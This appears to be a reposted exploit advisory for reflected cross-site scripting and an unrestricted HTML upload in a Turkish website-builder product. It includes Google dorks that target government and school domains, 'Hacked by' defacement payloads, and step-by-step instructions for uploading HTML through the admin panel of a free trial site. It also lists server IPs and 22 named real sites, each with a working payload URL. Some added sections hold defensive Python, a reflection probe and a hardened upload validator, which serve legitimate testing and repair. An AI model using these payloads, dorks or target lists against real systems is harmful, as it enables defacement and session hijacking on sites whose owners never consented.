| CVE | Category | Price | Severity |
|---|---|---|---|
| (none assigned) | CWE-79 | Unknown | Critical |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| KingSkrupellos | High | Remote | 2019-06-17 |
###################################################################
# Exploit Title : Yurdum Software Reflected XSS Privilege Escalation
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/06/2019
# Vendor Homepages : yurdumyazilim.com ~ sitenizolsun.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
# CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
# CWE-671 [ Lack of Administrator Control over Security ]
# CWE-522 [ Insufficiently Protected Credentials ]
# CWE-284 [ Improper Access Control ]
# CWE-285 [ Improper Authorization ]
# Google Dorks : ( "Yer sağlayıcı" = hosting provider, the footer string on sites built with this product )
# inurl:/?pnum= intext:Yer sağlayıcı: Yurdum Yazılım site:tr
# inurl:/?pnum= intext:Yer sağlayıcı: SitenizOlsun. site:tr
# intext:Yer sağlayıcı: SitenizOlsun site:tr
# intext:Yer sağlayıcı: Yurdum Yazılım site:tr
# inurl:/?pnum= site:tr
# inurl:/?pnum= site:gov.tr
# inurl:/?pnum= site:bel.tr
# inurl:/?pnum= site:k12.tr
# inurl:/?pnum= site:org.tr
# inurl:/?pnum= site:com.tr
# inurl:/?pnum= site:com
# inurl:/?pnum= site:net
# inurl:/?pnum= site:org
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/ascii/WLB-2019010038
###################################################################

Impact 1 Reflected XSS Cross Site Scripting (or Non-Persistent) :
*********************************************************
The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS occurs when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the browser. The most common delivery mechanism is to include the content as a parameter in a URL that is posted publicly or e-mailed directly to the victim.

URLs constructed in this manner are the core of many phishing schemes: the attacker convinces a victim to visit a URL that refers to the vulnerable site, the site reflects the attacker's content back, and the victim's browser executes it. A successful exploit lets the attacker execute arbitrary script in the context of the affected site and read browser-side data belonging to that origin. For example, the attacker can steal the victim's session cookie (where it is not marked HttpOnly), hijack the session and act as that user on the system.

Impact 2 Lack of Administrator Control over Security ( CWE-671 ) :
***********************************************
The product uses security features in a way that prevents the product's administrator from tailoring security settings to the environment in which the product is being used. This introduces resultant weaknesses or prevents the product from operating at the level of security the administrator wants.

Impact 3 Insufficiently Protected Credentials ( CWE-522 ) :
***********************************************
The application transmits or stores authentication credentials using an insecure method that is susceptible to unauthorized interception and/or retrieval.

Impact 4 Improper Access Control / Improper Authorization ( CWE-284, CWE-285 ) :
***********************************************
The software does not perform, or incorrectly performs, an authorization check when an actor attempts to access a resource or perform an action. An attacker could gain access to user accounts and to the sensitive data those accounts use.
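The reflection described under Impact 1, as an added example that is not part of the original advisory and not code from Yurdum Yazılım: a probe that sends an alphanumeric canary wrapped in the same quote-and-tag breakout the advisory's payloads use, then classifies whether the echoed parameter comes back raw (exploitable), HTML-escaped (the fix) or not at all. The parameter names pnum, Syf, SyfNmb, product and pt are the ones this advisory reports; the example.test host, the fetch callables and the two render_* stand-ins (one echoing pt verbatim as the advisory describes, one escaping it) are constructed here so the script runs offline.

```python
"""Reflected-XSS check for the ?pnum=N&pt=... pages described in this advisory.

Added example, not code from the advisory or the vendor. For a live,
authorized test, pass audit() a fetch callable that performs an HTTP GET and
returns the response body; the fake_* sites below are constructed stand-ins.
"""
from __future__ import annotations

import html
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit

# Page-selector parameters listed in the advisory; pt is the value that is echoed.
PAGE_PARAMS = ("pnum", "Syf", "SyfNmb", "product")
ECHOED_PARAM = "pt"


def make_canary() -> str:
    # Alphanumeric only, so any change to the surrounding markers is the server's doing.
    return "zx" + secrets.token_hex(4)


def probe_value(canary: str) -> str:
    # Same breakout the advisory's payloads rely on: a single quote to leave an
    # attribute value, a double quote, and a tag to prove HTML is interpreted.
    return f"{canary}'\"<b>{canary}"


def build_probe_urls(base: str, page_id: str, canary: str) -> dict[str, str]:
    """One probe URL per page-selector parameter: {param: url}."""
    return {
        p: f"{base}/?{urlencode({p: page_id, ECHOED_PARAM: probe_value(canary)})}"
        for p in PAGE_PARAMS
    }


def classify_reflection(body: str, canary: str) -> str:
    """'raw'     -> probe echoed byte-for-byte into HTML: exploitable
       'encoded' -> canary present but the markers were neutralised
       'absent'  -> pt is not reflected on this page at all"""
    if probe_value(canary) in body:
        return "raw"
    if canary in body:
        return "encoded"
    return "absent"


def audit(fetch, base: str, page_id: str = "1") -> dict[str, str]:
    """fetch(url) -> response body text. Returns {page_param: classification}."""
    canary = make_canary()
    return {
        p: classify_reflection(fetch(url), canary)
        for p, url in build_probe_urls(base, page_id, canary).items()
    }


# --- constructed stand-ins for the vulnerable and the fixed server ----------

def render_vulnerable(pt: str) -> str:
    # What the advisory describes: the pt value is written into the page as-is.
    return f"<h3>Sayfa: {pt}</h3>"


def render_fixed(pt: str) -> str:
    # Minimal fix: escape for the HTML context the value is written into;
    # quote=True also neutralises the %27 attribute breakout.
    return f"<h3>Sayfa: {html.escape(pt, quote=True)}</h3>"


def _server(render):
    def fetch(url: str) -> str:
        # Decodes the query string the way PHP's $_GET would.
        params = dict(parse_qsl(urlsplit(url).query))
        return render(params.get(ECHOED_PARAM, ""))
    return fetch


fake_vulnerable_site = _server(render_vulnerable)
fake_fixed_site = _server(render_fixed)

if __name__ == "__main__":
    print(audit(fake_vulnerable_site, "http://example.test"))  # every param -> 'raw'
    print(audit(fake_fixed_site, "http://example.test"))       # every param -> 'encoded'
```

The canary is checked rather than an alert() payload so the probe is safe to run against a production site with permission, and "encoded" versus "absent" distinguishes a page that was fixed from one that simply never reflects pt.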
###################################################################
# Reflected Cross Site Scripting XSS Exploits and Payloads :
*******************************************************
1%27<marquee><font%20color=lime%20size=32>XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee>
1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
/?pnum=1&pt=1%27"></h3></tr></td></table></tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos
/?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>KingSkrupellos</font></marquee>
/?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
/?pnum=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
/?SyfNmb=3&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
/?SyfNmb=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
/?Syf=4&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
/?Syf=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
/?product=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
/?product=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

In every case the injection point is the pt parameter: the leading %27 closes the attribute value it is written into, and the following markup is rendered by the browser. The page selector (pnum, SyfNmb, Syf, product) only has to name a page that exists.

# Add Administrator / Privilege Escalation Vulnerability :
***********************************************
To obtain an administrator account, register at sitenizolsun.com => click " Ücretsiz Dene " [ Try Free ].
You will be redirected to this address :
sitenizolsun.com/website-temalari?paket=6
sitenizolsun.com/website-temalari?paket=[ID-NUMBER]
Choose any package you want.
sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=6&paket=6
sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=[ID-NUMBER]&paket=[ID-NUMBER]
Ücretsiz Deneme Web Siteni Oluştur [ Create Your Free Test Website ]
Enter any username, a random or real e-mail address, a site title and a random phone number, then click " Sitemi Oluştur " [ Create My Website ] and wait. The service creates the test site and gives you an administrator e-mail address and password :
http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com
Yönetim paneli kullanıcı adınız [ Admin panel username ] : YOUR ADMINISTRATOR E-MAIL ADDRESS HERE
Yönetim paneli şifreniz [ Admin panel password ] : YOUR ADMINISTRATOR PASSWORD HERE
Administrator Login Path :
/login/
/login/do_login.php
One free test website - but, according to the author, you can control approximately 9397 websites at the same time.

You can upload files to the vulnerable system :
Step 1 : Go to " Temel Sayfalar " [ Main Pages ] => Anasayfa [ Homepage ]
Step 2 : Click " Anasayfayı Düzenle " [ Edit Homepage ]
Step 3 : Choose " Resim Ekle " [ Insert Image ] => click " Kaynak " [ Source ]
Step 4 : /syp/dosyayukle.php?DosyaTipi=2
http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com/syp/dosyayukle.php?DosyaTipi=2
You will see a yellow and white page that says :
Step 5 : Yüklemek istediğiniz dosyaları "Gözat"a tıklayarak bilgisayarınızdan seçiniz ve "Yükle"ye tıklayınız.
[ Select the files you want to upload from your computer by clicking "Browse" and click "Upload". ]
Step 6 : Choose " Sayfaya sığdır (Resimler için geçerli) Max 30 MB " [ Fit to page (applies to images), max 30 MB ]
Step 7 : Choose an .html file from your PC and upload it. The "Insert Image" uploader accepts HTML, not only images. Click the " Yükle " [ Upload ] button.
Your File Destination :
/FileUpload/epXXXXXX/File/[yourfilename.html]
If you use another section such as " Add Header Image " or " Add Album ", the file destination is :
/FileUpload/epXXXXXX/HeaderImages/crop/[RANDOM-NUMBERS].jpg
/FileUpload/epXXXXXX/Album/epXXXXXX_[YEAR][MONTH][DAY][RANDOM-NUMBERS].jpg
The author states that the defaced index can then be seen on 9397 websites at the same time.

Note that what the steps above demonstrate is an unrestricted file upload (an HTML document stored under the site's own /FileUpload/epXXXXXX/ tree and served from the site's origin) using the administrator credentials of the trial site the attacker registered. No request shown here writes to a site other than that trial site; the "9397 websites" figure is not substantiated by a cross-tenant request on this page.
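A hardened handler for the upload step above, added here as an example and not code from SitenizOlsun or Yurdum Yazılım. The page shows an "Insert Image" uploader that stores an .html file under /FileUpload/epXXXXXX/File/ and serves it from the site's origin; the checks below close that gap by sniffing the bytes, deriving the stored extension from the sniffed type rather than from the request, discarding the client filename, and serving the result with a fixed Content-Type and nosniff. Only the storage layout and the advertised 30 MB limit come from the advisory; the function names, the tenant id ep123456 and the two sample files are assumptions made for this example.

```python
"""Server-side checks an image uploader like /syp/dosyayukle.php?DosyaTipi=2 needs.

Added example, not vendor code. The storage layout /FileUpload/<tenant>/File/
and the 30 MB cap are as reported in the advisory; everything else is assumed.
"""
from __future__ import annotations

import secrets

# Allowed types; the stored extension is taken from here, never from the client.
IMAGE_TYPES = {
    "image/jpeg": ".jpg",
    "image/png": ".png",
    "image/gif": ".gif",
}
MAX_BYTES = 30 * 1024 * 1024  # the upload form advertises "Max 30 MB"


class UploadRejected(ValueError):
    """Raised for any upload the handler must not store."""


def sniff_image_type(data: bytes) -> str | None:
    """Identify JPEG/PNG/GIF by magic bytes; HTML, SVG, PHP and the rest -> None."""
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "image/png"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "image/gif"
    return None


def client_extension(filename: str) -> str:
    # Basename only (defeats ../ and backslash tricks), lower-cased, .jpeg -> .jpg.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
    return ".jpg" if ext == ".jpeg" else ext


def validate_image_upload(filename: str, data: bytes, tenant: str) -> str:
    """Return the storage path for an accepted image, or raise UploadRejected.

    The stored name is random, so the client's name never reaches the
    filesystem, and the extension follows the sniffed type, so an HTML
    document renamed deface.jpg is refused instead of being stored.
    """
    if not tenant.isalnum():
        raise UploadRejected("bad tenant id")
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty upload or over the size limit")
    mime = sniff_image_type(data)
    if mime is None:
        raise UploadRejected("content is not a JPEG, PNG or GIF")
    if client_extension(filename) != IMAGE_TYPES[mime]:
        raise UploadRejected("extension does not match content")
    return f"/FileUpload/{tenant}/File/{secrets.token_hex(8)}{IMAGE_TYPES[mime]}"


def serve_headers(stored_path: str) -> dict[str, str]:
    """Headers for serving a stored upload: fixed type, no MIME sniffing,
    and a sandboxing CSP so the file cannot run script even if served inline."""
    ext = "." + stored_path.rsplit(".", 1)[-1]
    mime = next(m for m, e in IMAGE_TYPES.items() if e == ext)
    return {
        "Content-Type": mime,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed samples: a minimal JPEG header, and the kind of file the advisory uploads.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 8
HTML_SAMPLE = b"<html><body><script>alert(document.domain)</script></body></html>"

if __name__ == "__main__":
    print(validate_image_upload("logo.jpg", JPEG_SAMPLE, "ep123456"))
    for name, blob in (("deface.html", HTML_SAMPLE), ("deface.jpg", HTML_SAMPLE)):
        try:
            validate_image_upload(name, blob, "ep123456")
        except UploadRejected as e:
            print(name, "->", e)
```

Serving user uploads from a separate, cookie-less origin (a dedicated files domain rather than the tenant's own site) removes the remaining risk entirely, since a stored document then cannot read the session of the site it was uploaded to.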
Congratulations :)
###################################################################
# Example Vulnerable Sites for XSS Reflected Cross Site Scripting :
***********************************************************
Vulnerable IP Addresses =>
51.254.33.49 => There are 37 domains hosted on this server.
81.171.1.140 => There are 8,552 domains hosted on this server.
159.69.209.93 => There are 798 domains hosted on this server.
[+] gurelektrikotomasyon.com/?Syf=4&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] gezintihaberleri.com/?SyfNmb=4&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] furkankirtasiye.com/?pnum=8&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] edirneselimiyeemlak.com/?Syf=13&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] doganisguvenligi.com/?Syf=21&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] cyberenerji.com/?pnum=9&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] siirtfistikpazari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] saglamelektronik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] radyobalkan.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] pediatrikkalpcerrahisi.com/?Syf=15&blg=1&ncat_id=699210&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] ozerdeminsaatdekorasyon.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] otoarizatespit.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] onaranelektrik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] oabtfizik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] trabzonbasket.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] ozelegitimaraclari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] reklamfolyosu.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] sivasaskf.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] tablopark.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] vansuaritmaci.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
[+] noktadusakabin.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E
###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################
Copyright ©2024 Exploitalert.